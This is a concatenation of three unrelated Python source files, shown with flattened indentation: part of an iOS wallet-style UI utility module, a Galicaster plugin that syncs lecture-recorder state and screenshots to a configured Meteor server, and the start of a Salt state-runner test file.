_f2 = UIFont.systemFontOfSize_weight_(11.0,UIFontWeightBold).retain()
_f2_ipad = UIFont.systemFontOfSize_weight_(14.0,UIFontWeightSemibold).retain()
_f3 = UIFont.systemFontOfSize_weight_(1.0,UIFontWeightThin).retain()
_f4 = UIFont.systemFontOfSize_weight_(14.0,UIFontWeightLight).retain()
_s3 = ns_from_py(' ').sizeWithAttributes_({NSFontAttributeName:_f3})
_kern = -0.5 # kerning for some of the text labels in some of the views (in points). Despite having given this an underscore name, other files in this package refer to this symbol. ;)
def stripAmount(s : str) -> str:
return s.translate({ord(i):None for i in '+- '}) #strip +/-
def makeFancyDateAttrString(datestr : str, font : ObjCInstance = None) -> ObjCInstance:
''' Make the ending MM:SS of the date field be 'light' text as per Max's UI spec '''
if font is None: font = _f4
if datestr: datestr = datestr.translate({ord('-') : '.'}) # replace hyphens in date with '.' chars as per Max's recommendations
ats = NSMutableAttributedString.alloc().initWithString_(datestr).autorelease()
l = len(datestr)
ix = datestr.rfind(' ', 0, l)
if ix >= 0:
r = NSRange(ix,l-ix)
ats.addAttribute_value_range_(NSFontAttributeName,font,r)
return ats
def hackyFiatAmtAttrStr(amtStr : str, fiatStr : str, ccy : str, pad : float, color : ObjCInstance = None, cb : Callable = None, kern : float = None, amtColor = None, isIpad = False) -> ObjCInstance:
#print("str=",amtStr,"pad=",pad,"spacesize=",_s3.width)
p = ''
if fiatStr:
if pad > 0.0:
n = round(pad / _s3.width)
p = ''.join([' ' for i in range(0, n)])
fiatStr = p + ' ' + fiatStr + ' ' + ccy
else:
fiatStr = ''
ats = NSMutableAttributedString.alloc().initWithString_(amtStr + fiatStr).autorelease()
rAmt = NSRange(0,len(amtStr))
ats.addAttribute_value_range_(NSFontAttributeName,_f1,rAmt)
if amtColor: ats.addAttribute_value_range_(NSForegroundColorAttributeName,amtColor,rAmt)
if fiatStr:
if callable(cb): cb()
r0 = NSRange(len(amtStr),len(p))
ats.addAttribute_value_range_(NSFontAttributeName,_f3,r0)
r = NSRange(len(amtStr)+len(p),len(fiatStr)-len(p))
r2 = NSRange(ats.length()-(len(ccy)+1),len(ccy))
ats.addAttribute_value_range_(NSFontAttributeName,_f2 if not isIpad else _f2_ipad,r)
if kern: ats.addAttribute_value_range_(NSKernAttributeName,kern,r)
#ats.addAttribute_value_range_(NSBaselineOffsetAttributeName,3.0,r)
if color:
ats.addAttribute_value_range_(NSForegroundColorAttributeName,color,r)
#ats.addAttribute_value_range_(NSFontAttributeName,_f3,r2)
#ats.addAttribute_value_range_(NSObliquenessAttributeName,0.1,r)
#ps = NSMutableParagraphStyle.new().autorelease()
#ps.setParagraphStyle_(NSParagraphStyle.defaultParagraphStyle)
#ps.alignment = NSJustifiedTextAlignment
#ps.lineBreakMode = NSLineBreakByWordWrapping
#ats.addAttribute_value_range_(NSParagraphStyleAttributeName, ps, r)
return ats
###############################################################################
# Facility to register python callbacks for when the keyboard is shown/hidden #
###############################################################################
_kbcb_idx = 0
_kbcb_dict = dict()
_kbcb_Entry = namedtuple('_kbcb_Entry', 'handle view obs handler onWillHide onWillShow onDidHide onDidShow')
class UTILSKBCBHandler(NSObject):
handle = objc_property()
@objc_method
def dealloc(self) -> None:
self.handle = None
send_super(__class__, self, 'dealloc')
@objc_method
def willHide_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if entry and entry.onWillHide: entry.onWillHide()
@objc_method
def didHide_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if entry and entry.onDidHide: entry.onDidHide()
@objc_method
def willShow_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if not entry: return
rect = py_from_ns(sender.userInfo)[str(UIKeyboardFrameEndUserInfoKey)].CGRectValue
window = entry.view.window()
if window: rect = entry.view.convertRect_fromView_(rect, window)
if entry.onWillShow: entry.onWillShow(rect)
@objc_method
def didShow_(self, sender) -> None:
entry = _kbcb_dict.get(self.handle, None)
if not entry: return
rect = py_from_ns(sender.userInfo)[str(UIKeyboardFrameEndUserInfoKey)].CGRectValue
window = entry.view.window()
if window: rect = entry.view.convertRect_fromView_(rect, window)
if entry.onDidShow: entry.onDidShow(rect)
# it's safe to never unregister, as an objc associated object will be created for the view in question and will clean everything up on
# view dealloc. The '*Hide' callbacks should take 0 arguments, the '*Show' callbacks take 1, a CGRect of the keyboard in the destination view's coordinates
def register_keyboard_callbacks(view : ObjCInstance, onWillHide = None, onWillShow = None, onDidHide = None, onDidShow = None) -> int:
if not any([onWillHide, onWillShow, onDidShow, onDidShow]) or not view or not isinstance(view, UIView):
NSLog("WARNING: register_keyboard_callbacks: need at least one callback specified, as well as non-null view! Will return early!")
return 0
global _kbcb_idx
_kbcb_idx += 1
handle = _kbcb_idx
obs = NSDeallocObserver(view)
handler = UTILSKBCBHandler.new()
handler.handle = handle
entry = _kbcb_Entry(handle, view, obs, handler, onWillHide, onWillShow, onDidHide, onDidShow)
if entry.onWillHide: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('willHide:'),UIKeyboardWillHideNotification,None)
if entry.onWillShow: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('willShow:'),UIKeyboardWillShowNotification,None)
if entry.onDidHide: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('didHide:'),UIKeyboardDidHideNotification,None)
if entry.onDidShow: NSNotificationCenter.defaultCenter.addObserver_selector_name_object_(entry.handler,SEL('didShow:'),UIKeyboardDidShowNotification,None)
_kbcb_dict[handle] = entry
obs.connect(lambda x: unregister_keyboard_callbacks(handle))
return handle
# unless you call this, the keyboard callback will stay alive until the target view is dealloc'd. At which time all resources
# WILL be cleaned-up. This function is provided in case you want to stop observing the keyboard hide/show events early.
def unregister_keyboard_callbacks(handle : int) -> None:
entry = None
if isinstance(handle, int): entry = _kbcb_dict.pop(handle, None)
if entry:
if entry.onWillHide: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardWillHideNotification,None)
if entry.onWillShow: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardWillShowNotification,None)
if entry.onDidHide: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardDidHideNotification,None)
if entry.onDidShow: NSNotificationCenter.defaultCenter.removeObserver_name_object_(entry.handler,UIKeyboardDidShowNotification,None)
entry.obs.disconnect()
entry.obs.dissociate()
entry.handler.release()
else:
NSLog("*** WARNING: unregister_keyboard_callbacks could not find handle %d!", handle)
# boilerplate code below to auto-scroll textfields/textviews when keyboard shown. Install this in viewWillAppear.
def register_keyboard_autoscroll(sv : UIScrollView) -> int:
if not isinstance(sv, UIScrollView):
NSLog("*** WARNING: register_keyboard_autoscroll called but it wasn't passed a UIScrollView. Ignoring!")
return None
def kbShow(r : CGRect) -> None:
resp = UIResponder.currentFirstResponder()
window = sv.window()
if resp and isinstance(resp, UIView) and window and resp.window():
#r = sv.convertRect_toView_(r, window)
visible = sv.convertRect_toView_(sv.bounds, window)
visible.size.height -= r.size.height
respFrame = resp.convertRect_toView_(resp.bounds, window)
origin = respFrame.origin
bottomLeft = CGPoint(origin.x, origin.y+respFrame.size.height)
diff = None
if not CGRectContainsPoint(visible, bottomLeft) and (is_portrait() or is_ipad()):
diff = (bottomLeft.y - (visible.origin.y+visible.size.height)) + 25.0
elif not CGRectContainsPoint(visible, origin):
diff = origin.y - visible.origin.y - 25.0
if diff:
'''
def fmt(x):
if isinstance(x, CGRect):
return "%f,%f,%f,%f"%(x.origin.x,x.origin.y,x.size.width,x.size.height)
elif isinstance(x, CGPoint):
return "%f,%f"%(x.x,x.y)
else:
return str(x)
print("window",fmt(window.bounds),"origin",fmt(origin),"bottomLeft",fmt(bottomLeft),"respFrame",fmt(respFrame),"visible",fmt(visible),"contentOffset",fmt(sv.contentOffset))
'''
scrollPoint = CGPoint(0.0, sv.contentOffset.y + diff)#origin.y - visible.size.height + respFrame.size.height + 10)
sv.setContentOffset_animated_(scrollPoint, True)
#def kbHide() -> None:
# #sv.setContentOffset_animated_(CGPoint(0,0), True)
# pass
return register_keyboard_callbacks(sv, onWillShow = kbShow)#, onDidHide = kbHide)
# be sure to unregister the autoscroller when view disappears. Install unregister call in viewWillDisappear.
def unregister_keyboard_autoscroll(handle : int) -> None:
unregister_keyboard_callbacks(handle)
##### File Backed Dict
class FileBackedDict(object):
def __init__(self, fileName : str, other : object = None):
self._d = dict()
self._fn = fileName
if isinstance(other, FileBackedDict):
self._d = other._d.copy()
if self.write():
NSLog("File-backed dict '%s' created as copy of '%s'",os.path.split(self._fn)[-1],os.path.split(other._fn)[-1])
else:
if os.path.exists(self._fn): self.read()
else: NSLog("New empty file-backed dict '%s' -- will create file once data is added.",os.path.split(self._fn)[-1])
def read(self) -> bool:
if not os.path.exists(self._fn):
NSLog("*** WARNING: JSON dict file does not (yet?) exist: %s", self._fn)
return False
try:
with open(self._fn, "r") as f:
result = json.load(f)
except:
NSLog("*** WARNING: Cannot read JSON dict file (%s) exception was: %s", self._fn, str(sys.exc_info()[1]))
return False
if not isinstance(result, dict):
NSLog("*** WARNING: JSON file read but is not a dict: %s", self._fn)
return False
self._d = result
return True
def write(self) -> bool:
try:
with open(self._fn, "w") as f:
json.dump(self._d, f, indent=4)
os.chmod(self._fn, stat.S_IREAD | stat.S_IWRITE)
except:
NSLog("*** WARNING: Cannot write JSON dict file (%s) exception was: %s", self._fn, str(sys.exc_info()[1]))
return False
return True
def dict(self) -> dict:
return self._d
def get(self, key : Any, default : Any = None) -> Any:
return self._d.get(key, default)
def set(self, key : Any, value : Any, save : bool = True) -> None:
self._d[key] = value
if save: self.write()
def has(self, key : Any) -> bool:
return bool(key in self._d)
def pop(self, key : Any, save : bool = True) -> Any:
if not isinstance(save, bool):
NSLog("*** WARNING: FileBackedDict's pop() method doesn't take a default value. The second argument is always the 'save' arg!")
ret = self._d.pop(key, None)
if save: self.write()
return ret
def clearAll(self, save : bool = True) -> None:
self._d = dict()
if save: self.write()
##### Wrapper for iOS Secure key enclave -- instantiates a KeyInterface class on the Objective C side. Note this requires TouchID/FaceID
class SecureKeyEnclave:
instances = 0
def __init__(self, keyDomain : str):
self._keyInterface = KeyInterface.keyInterfaceWithPublicKeyName_privateKeyName_(keyDomain + ".pubkey", keyDomain + ".privkey").retain()
SecureKeyEnclave.instances += 1
#NSLog("SecureKeyEnclave: instance created (%d total extant instances)",SecureKeyEnclave.instances)
def __del__(self):
try:
if self._keyInterface:
self._keyInterface.release()
self._keyInterface = None
SecureKeyEnclave.instances -= 1
NSLog("SecureKeyEnclave: instance deleted (%d total instances left)",SecureKeyEnclave.instances)
except:
pass
def biometrics_available(self) -> bool:
return self._keyInterface.biometricsAreAvailable
def biometrics_are_not_available_reason(self) -> str: # returns failure reason if unavailable, or '' if available
err = objc_id(0)
if not self._keyInterface.biometricsAreAvailableWithError_(byref(err)):
if err and err.value:
err = ObjCInstance(err)
return str(err.description)
else:
return 'Unknown Reason'
return ''
def has_keys(self) -> bool:
return bool(self._keyInterface.publicKeyExists)
def delete_keys(self) -> bool:
return self._keyInterface.deleteKeyPair()
# Asynchronously generate the private/public keypair. Note that touchID doesn't seem to come up when this is called
# but it may. Completion is called on success or error. If error, first arge is false and second arg may be an iOS error string.
def generate_keys(self, completion : Callable[[bool,str],None] = None) -> None:
if self._keyInterface.publicKeyExists:
if callable(completion):
completion(True,'')
return
def Compl(b : bool, e : objc_id) -> None:
e = ObjCInstance(e) if e and e.value else None
if callable(completion): completion(bool(b),str(e.description) if e else '')
self._keyInterface.generateTouchIDKeyPairWithCompletion_(Compl)
def encrypt_data(self, data : bytes) -> bytes:
if isinstance(data, str): data = data.encode('utf-8')
if not isinstance(data, bytes): raise ValueError('SecureKeyEnclave.encrypt_data requires a bytes argument!')
plainText = NSData.dataWithBytes_length_(data,len(data))
err = objc_id(0)
cypherText = self._keyInterface.encryptData_error_(plainText, byref(err))
if not cypherText:
e = str(ObjCInstance(err).description) if err and err.value else ''
NSLog("SecureKeyEnclave encrypt data failed with error: %s",e)
return None
return bytes((c_ubyte * cypherText.length).from_address(cypherText.bytes))
# input: any plaintext string. output: a hex representation of the encrypted cyphertext data eg 'ff80be3376ff..'
def encrypt_str2hex(self, plainText : str) -> str:
b = self.encrypt_data(plainText)
if b is not None:
import binascii
return binascii.hexlify(b).decode('utf-8')
return None
# the inverse of the above. input: a hex string, eg 'ff80be3376...', callback is called with (plainText:str, error:str) as args
def decrypt_hex2str(self, hexdata : str, completion : Callable[[str,str],None], prompt : str = None) -> None:
if not callable(completion):
raise ValueError('A completion function is required as the second argument to this function!')
import binascii
cypherBytes = binascii.unhexlify(hexdata)
def MyCompl(pt : bytes, error : str) -> None:
plainText = pt.decode('utf-8') if pt is not None else None
completion(plainText, error)
self.decrypt_data(cypherBytes, MyCompl, prompt = prompt)
# May pop up a touchid window, which user may cancel. If touchid not available, or user cancels, the completion is called
# with None,errstr as args (errStr comes from iOS and is pretty arcane).
# Otherwise completion is called with the plainText bytes as first argument on success.
def decrypt_data(self, data : bytes, completion : Callable[[bytes,str],None], prompt : str = None) -> None:
if not callable(completion):
raise ValueError('A completion function is required as the second argument to this function!')
if not prompt: prompt = _("Authenticate, please")
if isinstance(data, str): data = data.encode('utf-8')
if not isinstance(data, bytes): raise ValueError('A bytes or str object is required as the first argument to this function!')
cypherText = NSData.dataWithBytes_length_(data, len(data))
def Compl(dptr : objc_id, eptr : objc_id) -> None:
plainText = ObjCInstance(dptr) if dptr and dptr.value else None
error = ObjCInstance(eptr).description if eptr and eptr.value else None
if plainText:
plainText = bytes((c_ubyte * plainText.length).from_address(plainText.bytes))
completion(plainText, error)
self._keyInterface.prompt = prompt
self._keyInterface.decryptData_completion_(cypherText, Compl)
'''
@classmethod
def DoTests(cls, bundleId : str, doDelete : bool = False) -> None:
keyEnclave = cls(bundleId)
print("BioMetricsAvail:",keyEnclave.biometrics_available())
print("BioMetricsNotAvailReason:",keyEnclave.biometrics_are_not_available_reason())
if doDelete:
keyEnclave.delete_keys()
print("Deleted All Keys")
pt = b'The quick brown fox jumped over the lazy dogs!!\0\0'
ptstr = pt.decode('utf-8')
def DataDecrypted(pts : str, error : str) -> None:
if pts is None:
print("Got decryption error", error)
else:
print("decrypted data was [",pts.encode('utf-8'),"]","compare =", pts==ptstr)
def DoEnc() -> None:
c = keyEnclave.encrypt_str2hex(ptstr)
if c is not None:
print("cypherText=",c)
keyEnclave.decrypt_hex2str(c,DataDecrypted)
else:
print("CypherText was NONE...!")
def KeysGenerated(b : bool, e : str) -> None:
print("Keys generated:",b,e)
if b: DoEnc()
if not keyEnclave.has_keys():
keyEnclave.generate_keys(KeysGenerated)
else:
DoEnc()
def Cleaner() -> None:
# keep a ref around for 10s then delete object.
nonlocal keyEnclave
keyEnclave = None
call_later(10.0, Cleaner)
'''
##### Boilerplate crap
class boilerplate:
# iOS weirdness. Buttons don't always flash to highlighted state on tap.. so we have to force it using this hack.
@staticmethod
def vc_highlight_button_then_do(vc : UIViewController, but : UIButton, func : Callable[[],None]) -> None:
#if not isinstance(vc, UIViewController) or not isinstance(but, UIButton) or not callable(func):
# raise ValueError('One of the arguments passed to vc_highlight_button_then_do is invalid!')
but.retain()
call_later(0.030, lambda: but.setHighlighted_(True))
call_later(0.3, lambda: but.autorelease().setHighlighted_(False))
vc.retain()
call_later(0.1, lambda: vc.autorelease().viewIfLoaded and func())
# Layout constraint stuff.. programatically
@staticmethod
def layout_peg_view_to_superview(view : UIView) -> None:
if not view.superview():
NSLog("Warning: layout_peg_view_to_superview -- passed-in view lacks a superview!")
return
sv = view.superview()
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeCenterX, NSLayoutRelationEqual, view, NSLayoutAttributeCenterX, 1.0, 0.0 ))
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeCenterY, NSLayoutRelationEqual, view, NSLayoutAttributeCenterY, 1.0, 0.0 ))
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeHeight, NSLayoutRelationEqual, view, NSLayoutAttributeHeight, 1.0, 0.0 ))
sv.addConstraint_(NSLayoutConstraint.constraintWithItem_attribute_relatedBy_toItem_attribute_multiplier_constant_(
sv, NSLayoutAttributeWidth, NSLayoutRelationEqual, view, NSLayoutAttributeWidth, 1.0, 0.0 ))
|
ddp.py
|
# DDP galicaster plugin
#
# Copyright (c) 2016 University of Sussex
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# import calendar
import cStringIO
import requests
# import socket
from threading import Event, Thread
import time
import uuid
from gi.repository import Gtk, Gdk, GObject, Pango, GdkPixbuf
from MeteorClient import MeteorClient
import pyscreenshot as ImageGrab
from PIL import Image
from galicaster.core import context
conf = context.get_conf()
dispatcher = context.get_dispatcher()
logger = context.get_logger()
def init():
ddp = DDP()
ddp.start()
class DDP(Thread):
def __init__(self):
Thread.__init__(self)
self.meteor = conf.get('ddp', 'meteor')
self.client = MeteorClient(self.meteor, debug=False)
self.client.on('added', self.on_added)
self.client.on('changed', self.on_changed)
self.client.on('subscribed', self.on_subscribed)
self.client.on('connected', self.on_connected)
self.client.on('removed', self.on_removed)
self.client.on('closed', self.on_closed)
self.client.on('logged_in', self.on_logged_in)
self.displayName = conf.get('ddp', 'room_name')
self.vu_min = -50
self.vu_range = 50
self.vu_data = 0
self.last_vu = None
self.ip = conf.get('ingest', 'address')
self.id = conf.get('ingest', 'hostname')
self._user = conf.get('ddp', 'user')
self._password = conf.get('ddp', 'password')
self._http_host = conf.get('ddp', 'http_host')
self._audiostream_port = conf.get('audiostream', 'port') or 31337
self.store_audio = conf.get_boolean('ddp', 'store_audio')
self.screenshot_file = conf.get('ddp', 'existing_screenshot')
self.high_quality = conf.get_boolean('ddp', 'hq_snapshot')
self.paused = False
self.recording = False
self.currentMediaPackage = None
self.currentProfile = None
self.has_disconnected = False
screen = Gdk.Screen.get_default()
self._screen_width = screen.get_width()
self._screen_height = screen.get_height()
self.cardindex = None
cam_available = conf.get(
'ddp',
'cam_available') or 0
if cam_available in ('True', 'true', True, '1', 1):
self.cam_available = 1
elif cam_available in ('False', 'false', False, '0', 0):
self.cam_available = 0
else:
self.cam_available = int(cam_available)
# Getting audiostream params. either using existing audiostreaming server like icecast or the audiostream plugin
if conf.get('ddp', 'existing_stream_host'):
self._stream_host = conf.get('ddp', 'existing_stream_host')
else:
self._stream_host = self.ip
if conf.get_int('ddp', 'existing_stream_port'):
self._audiostream_port = conf.get_int('ddp', 'existing_stream_port')
else:
self._audiostream_port = conf.get_int('audiostream', 'port') or 31337
if conf.get('ddp', 'existing_stream_key'):
self.stream_key = conf.get('ddp', 'existing_stream_key')
else:
self.stream_key = uuid.uuid4().get_hex()
if conf.get('ddp', 'extra_params'):
self.extra_params_list = conf.get('ddp', 'extra_params').split(';')
else:
self.extra_params_list = []
logger.info('audiostream URI: {}'.format('http://' + self._stream_host + ':' + str(self._audiostream_port) + '/' + self.stream_key))
dispatcher.connect('init', self.on_init)
dispatcher.connect('recorder-vumeter', self.vumeter)
dispatcher.connect('timer-short', self.update_vu)
dispatcher.connect('timer-short', self.heartbeat)
dispatcher.connect('recorder-started', self.on_start_recording)
dispatcher.connect('recorder-stopped', self.on_stop_recording)
dispatcher.connect('recorder-status', self.on_rec_status_update)
def run(self):
self.connect()
def connect(self):
if not self.has_disconnected:
try:
self.client.connect()
except Exception:
logger.warn('DDP connection failed')
def update(self, collection, query, update):
if self.client.connected and self.subscribedTo('GalicasterControl'):
try:
self.client.update(
collection,
query,
update,
callback=self.update_callback)
except Exception:
logger.warn(
"Error updating document "
"{collection: %s, query: %s, update: %s}" %
(collection, query, update))
def insert(self, collection, document):
if self.client.connected and self.subscribedTo('GalicasterControl'):
try:
self.client.insert(
collection,
document,
callback=self.insert_callback)
except Exception:
logger.warn(
"Error inserting document {collection: %s, document: %s}" %
(collection, document))
def heartbeat(self, element):
if self.client.connected:
self.update_images()
else:
self.connect()
def on_start_recording(self, sender, id):
self.recording = True
self.currentMediaPackage = self.media_package_metadata(id)
self.currentProfile = conf.get_current_profile().name
self.update(
'rooms', {
'_id': self.id
}, {
'$set': {
'currentMediaPackage': self.currentMediaPackage,
'currentProfile': self.currentProfile,
'recording': self.recording
}
})
def on_stop_recording(self, mpid, sender=None):
self.recording = False
self.currentMediaPackage = None
self.currentProfile = None
self.update(
'rooms', {
'_id': self.id
}, {
'$unset': {
'currentMediaPackage': '',
'currentProfile': ''
}, '$set': {
'recording': self.recording
}
})
self.update_images(1.5)
def on_init(self, data):
self.update_images(1.5)
def update_images(self, delay=0.0):
worker = Thread(target=self._update_images, args=(delay,))
worker.start()
def _update_images(self, delay):
time.sleep(delay)
files = {}
if not self.screenshot_file:
# take a screenshot with pyscreenshot
im = ImageGrab.grab(bbox=(0, 0, self._screen_width, self._screen_height), backend='imagemagick')
else:
try:
# used if screenshot already exists
im = Image.open(self.screenshot_file)
except IOError as e:
logger.warn("Unable to open screenshot file {0}".format(self.screenshot_file))
return
output = cStringIO.StringIO()
image_format = 'JPEG'
if not self.high_quality:
im.thumbnail((640, 360), Image.ANTIALIAS)
else:
image_format = 'PNG'
if im.mode != "RGB":
im = im.convert("RGB")
im.save(output, format=image_format) # to reduce jpeg size use param: optimize=True
files['galicaster'] = ('galicaster.jpg', output.getvalue(),
'image/jpeg')
try:
# add verify=False for testing self signed certs
requests.post(
"%s/image/%s" %
(self._http_host, self.id), files=files, auth=(
self._user, self._password)) # to ignore ssl verification, use param: verify=False
except Exception:
logger.warn('Unable to post images')
def vumeter(self, element, data, data_chan2, vu_bool):
if data == "Inf":
data = 0
else:
if data < -self.vu_range:
data = -self.vu_range
elif data > 0:
data = 0
self.vu_data = int(((data + self.vu_range) / float(self.vu_range)) * 100)
def update_vu(self, element):
if self.vu_data != self.last_vu:
update = {'vumeter': self.vu_data}
self.update('rooms', {'_id': self.id}, {'$set': update})
self.last_vu = self.vu_data
def on_rec_status_update(self, element, data):
if data == 'paused':
is_paused = True
else:
is_paused = False
if is_paused:
self.update_images(.75)
if self.paused == is_paused:
self.update(
'rooms', {
'_id': self.id}, {
'$set': {
'paused': is_paused}})
self.paused = is_paused
if data == 'recording':
self.update_images(.75)
def media_package_metadata(self, id):
mp = context.get('recorder').current_mediapackage
line = mp.metadata_episode
duration = mp.getDuration()
line["duration"] = long(duration / 1000) if duration else None
# FIXME Does series_title need sanitising as well as duration?
created = mp.getDate()
# line["created"] = calendar.timegm(created.utctimetuple())
for key, value in mp.metadata_series.iteritems():
line["series_" + key] = value
for key, value in line.iteritems():
if value in [None, []]:
line[key] = ''
# return line
return line
def subscription_callback(self, error):
if error:
logger.warn("Subscription callback returned error: %s" % error)
def insert_callback(self, error, data):
if error:
logger.warn("Insert callback returned error: %s" % error)
def update_callback(self, error, data):
if error:
logger.warn("Update callback returned error: %s" % error)
def on_subscribed(self, subscription):
if(subscription == 'GalicasterControl'):
me = self.client.find_one('rooms')
# Data to push when inserting or updating
data = {
'displayName': self.displayName,
'ip': self.ip,
'paused': self.paused,
'recording': self.recording,
'heartbeat': int(time.time()),
'camAvailable': self.cam_available,
'inputs': self.inputs(),
'stream': {
'host': self._stream_host,
'port': self._audiostream_port,
'key': self.stream_key
}
}
# Parse extra Meteor Mongodb collection elements and append
for params in self.extra_params_list:
param = params.split(':')
data[param[0]] = param[1]
if self.currentMediaPackage:
data['currentMediaPackage'] = self.currentMediaPackage
if self.currentProfile:
data['currentProfile'] = self.currentProfile
if me:
# Items to unset
unset = {}
if not self.currentMediaPackage:
unset['currentMediaPackage'] = ''
if not self.currentProfile:
unset['currentProfile'] = ''
# Update to push
update = {
'$set': data
}
if unset:
update['$unset'] = unset
self.update('rooms', {'_id': self.id}, update)
else:
data['_id'] = self.id
self.insert('rooms', data)
def inputs(self):
inputs = {
'presentations': ['Presentation']
}
inputs['cameras'] = []
labels = conf.get('ddp', 'cam_labels')
cam_labels = []
if labels:
cam_labels = [l.strip() for l in labels.split(',')]
for i in range(0, self.cam_available):
label = cam_labels[i] if i < len(
cam_labels) else "Camera %d" % (i + 1)
inputs['cameras'].append(label)
return inputs
def on_added(self, collection, id, fields):
pass
def on_changed(self, collection, id, fields, cleared):
me = self.client.find_one('rooms')
if self.paused != me['paused']:
self.set_paused(me['paused'])
if context.get('recorder').is_recording() != me['recording']:
self.set_recording(me)
def on_removed(self, collection, id):
self.on_subscribed(None)
def set_paused(self, new_status):
if not self.paused:
self.paused = new_status
context.get('recorder').pause()
else:
self.paused = False
context.get('recorder').resume()
def set_recording(self, me):
self.recording = me['recording']
if self.recording:
# FIXME: Metadata isn't passed to recorder
meta = me.get('currentMediaPackage', {}) or {}
profile = me.get('currentProfile', 'nocam')
series = (meta.get('series_title', ''), meta.get('isPartOf', ''))
user = {'user_name': meta.get('creator', ''),
'user_id': meta.get('rightsHolder', '')}
title = meta.get('title', 'Unknown')
context.get('recorder').record()
else:
context.get('recorder').stop()
def on_connected(self):
logger.info('Connected to Meteor')
token = conf.get('ddp', 'token')
self.client.login(self._user, self._password, token=token)
def on_logged_in(self, data):
conf.set('ddp', 'token', data['token'])
conf.update()
try:
self.client.subscribe(
'GalicasterControl',
params=[
self.id],
callback=self.subscription_callback)
except Exception:
logger.warn('DDP subscription failed')
def on_closed(self, code, reason):
self.has_disconnected = True
logger.error('Disconnected from Meteor: err %d - %s' % (code, reason))
def subscribedTo(self, publication):
return self.client.subscriptions.get(publication) != None
|
test_state.py
|
# -*- coding: utf-8 -*-
'''
Tests for the state runner
'''
# Import Python Libs
from __future__ import absolute_import
import errno
import os
import shutil
import signal
import tempfile
import textwrap
import yaml
import threading
from salt.ext.six.moves import queue
# Import Salt Testing Libs
from tests.support.case import ShellCase
from tests.support.unit import skipIf
from tests.support.paths import TMP
# Import Salt Libs
import salt.utils
import salt.utils.platform
import salt.utils.event
import salt.utils.files
class StateRunnerTest(ShellCase):
'''
Test the state runner.
'''
def add_to_queue(self, q, cmd):
'''
helper method to add salt-run
return data to a queue
'''
ret = self.run_run(cmd)
q.put(ret)
q.task_done()
def test_orchestrate_output(self):
'''
Ensure the orchestrate runner outputs useful state data.
In Issue #31330, the output only contains ['outputter:', ' highstate'],
and not the full stateful return. This tests ensures we don't regress in that
manner again.
Also test against some sample "good" output that would be included in a correct
orchestrate run.
'''
#ret_output = self.run_run_plus('state.orchestrate', 'orch.simple')['out']
ret_output = self.run_run('state.orchestrate orch.simple')
bad_out = ['outputter:', ' highstate']
good_out = [' Function: salt.state',
' Result: True',
'Succeeded: 1 (changed=1)',
'Failed: 0',
'Total states run: 1']
# First, check that we don't have the "bad" output that was displaying in
# Issue #31330 where only the highstate outputter was listed
self.assertIsNot(bad_out, ret_output)
# Now test that some expected good sample output is present in the return.
for item in good_out:
self.assertIn(item, ret_output)
def test_orchestrate_nested(self):
'''
test salt-run state.orchestrate and failhard with nested orchestration
'''
if os.path.exists('/tmp/ewu-2016-12-13'):
os.remove('/tmp/ewu-2016-12-13')
_, code = self.run_run(
'state.orchestrate nested-orch.outer',
with_retcode=True)
self.assertFalse(os.path.exists('/tmp/ewu-2016-12-13'))
self.assertNotEqual(code, 0)
def test_state_event(self):
'''
test to ensure state.event
runner returns correct data
'''
q = queue.Queue(maxsize=0)
cmd = 'state.event salt/job/*/new count=1'
expect = '"minions": ["minion"]'
server_thread = threading.Thread(target=self.add_to_queue, args=(q, cmd))
server_thread.setDaemon(True)
server_thread.start()
while q.empty():
self.run_salt('minion test.ping --static')
out = q.get()
self.assertIn(expect, str(out))
server_thread.join()
@skipIf(salt.utils.platform.is_windows(), '*NIX-only test')
class OrchEventTest(ShellCase):
'''
Tests for orchestration events
'''
def setUp(self):
self.timeout = 60
self.master_d_dir = os.path.join(self.get_config_dir(), 'master.d')
try:
os.makedirs(self.master_d_dir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
self.conf = tempfile.NamedTemporaryFile(
mode='w',
suffix='.conf',
dir=self.master_d_dir,
delete=True,
)
self.base_env = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, self.base_env)
self.addCleanup(self.conf.close)
for attr in ('timeout', 'master_d_dir', 'conf', 'base_env'):
self.addCleanup(delattr, self, attr)
# Force a reload of the configuration now that our temp config file has
# been removed.
self.addCleanup(self.run_run_plus, 'test.arg', __reload_config=True)
def alarm_handler(self, signal, frame):
raise Exception('Timeout of {0} seconds reached'.format(self.timeout))
def write_conf(self, data):
'''
Dump the config dict to the conf file
'''
self.conf.write(yaml.dump(data, default_flow_style=False))
self.conf.flush()
